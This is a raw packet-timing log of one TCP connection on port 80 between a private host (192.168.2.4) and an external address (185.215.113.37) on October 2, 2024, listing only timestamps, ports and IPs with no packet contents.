Oct 2, 2024 18:19:29.589958906 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.589968920 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.589996099 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.590027094 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.590166092 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.590198040 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.590213060 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.590229034 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.590236902 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.590245008 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.590255022 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.590259075 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.590274096 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.590286016 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.590287924 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.590301991 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.590301991 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.590318918 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.590326071 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.590353966 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.590378046 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.590495110 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.590509892 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.590524912 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.590538025 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.590540886 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.590557098 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.590559006 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.590579033 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.590605021 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.590678930 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.590693951 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.590708017 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.590723038 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.590739012 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.590744972 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.590764046 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.590784073 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.590812922 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.590861082 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.590980053 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.590996981 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.591011047 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.591026068 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.591034889 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.591041088 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.591056108 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.591064930 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.591069937 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.591080904 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.591084003 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.591099024 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.591106892 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.591115952 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.591128111 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.591150045 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.591165066 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.591419935 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.591435909 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.591449976 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.591464043 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.591473103 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.591478109 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.591487885 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.591502905 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.591507912 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.591516972 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.591527939 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.591533899 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.591542006 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.591562986 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.591579914 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.591732025 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.591747046 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.591762066 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.591777086 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.591784000 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.591790915 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.591795921 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.591805935 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.591820002 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.591823101 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.591845989 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.591855049 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.591861963 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.591872931 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.591876984 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.591892004 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.591898918 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.591906071 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.591921091 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.591924906 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.591934919 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.591947079 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.591950893 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.591965914 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.591972113 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.591980934 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.591984034 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.592004061 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.592022896 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.592444897 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.592459917 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.592473984 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.592489004 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.592503071 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.592510939 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.592519045 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.592525959 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.592540026 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.592545986 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.592554092 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.592570066 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.592576981 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.592585087 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.592600107 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.592606068 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.592622995 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.592653990 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.863084078 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.863110065 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.863128901 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.863166094 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.863193989 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.863215923 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.863230944 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.863246918 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.863271952 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.863295078 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.863295078 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.863311052 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.863356113 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.863487959 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.863512993 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.863529921 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.863537073 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.863544941 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.863553047 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.863559961 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.863574028 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.863574982 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.863590956 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.863598108 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.863624096 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.863658905 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.863823891 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.863840103 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.863854885 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.863862038 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.863871098 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.863881111 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.863884926 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.863894939 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.863899946 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.863914967 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.863919973 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.863930941 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.863945007 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.863946915 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.863961935 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.863976955 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.863980055 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.863991976 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.863993883 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.864006996 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.864017963 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.864022970 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.864048958 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.864057064 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.864067078 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.864103079 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.864326000 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.864341021 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.864355087 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.864367008 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.864368916 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.864383936 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.864389896 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.864398003 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.864402056 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.864412069 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.864428997 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.864450932 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.864450932 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.864480972 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.864530087 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.864546061 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.864561081 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.864577055 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.864583015 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.864592075 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.864607096 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.864609957 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.864622116 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.864636898 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.864645958 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.864651918 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.864669085 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.864691973 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.864727974 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.864742994 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.864757061 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.864770889 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.864780903 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.864784002 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.864788055 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.864798069 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.864806890 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.864811897 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.864820004 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.864825964 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.864840984 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.864851952 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.864865065 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.864876032 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.864897013 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.864918947 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.865309000 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.865324020 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.865339041 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.865355015 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.865355015 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.865360975 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.865370989 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.865381002 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.865386963 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.865401030 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.865403891 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.865420103 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.865434885 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.865525961 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.865540981 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.865555048 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.865570068 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.865582943 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.865585089 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.865600109 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.865605116 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.865613937 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.865628958 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.865637064 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.865653038 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.865665913 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.865677118 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.865680933 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.865699053 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.865714073 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.865719080 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.865727901 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.865742922 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.865745068 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.865757942 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.865770102 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.865772963 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.865796089 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.865803003 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.865819931 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.865844965 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.866393089 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.866409063 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.866434097 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.866463900 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.866466999 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.866513014 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.866525888 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.866540909 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.866540909 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.866555929 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.866569042 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.866569042 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.866571903 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.866586924 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.866590023 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.866601944 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.866609097 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.866616964 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.866631985 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.866645098 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.866648912 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.866648912 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.866658926 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.866663933 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.866672993 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.866688013 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.866719961 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.866729975 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.866735935 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.866744995 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.866750002 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.866766930 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.866771936 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.866780996 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.866796017 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.866802931 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.866811037 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.866826057 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.866831064 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.866839886 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.866854906 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.866867065 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.866867065 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.866895914 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.867398977 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.867418051 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.867440939 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.867480993 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.867487907 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.867513895 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.867527962 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.867542982 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.867549896 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.867557049 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.867561102 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.867573977 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.867588997 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.867594004 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.867603064 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.867619038 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.867621899 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.867633104 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.867646933 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.867654085 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.867659092 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.867661953 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.867676020 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.867676020 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.867690086 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.867691040 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.867703915 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.867719889 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.867723942 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:29.867733955 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:29.867739916 CEST	49737	80	192.168.2.4	185.215.113.37
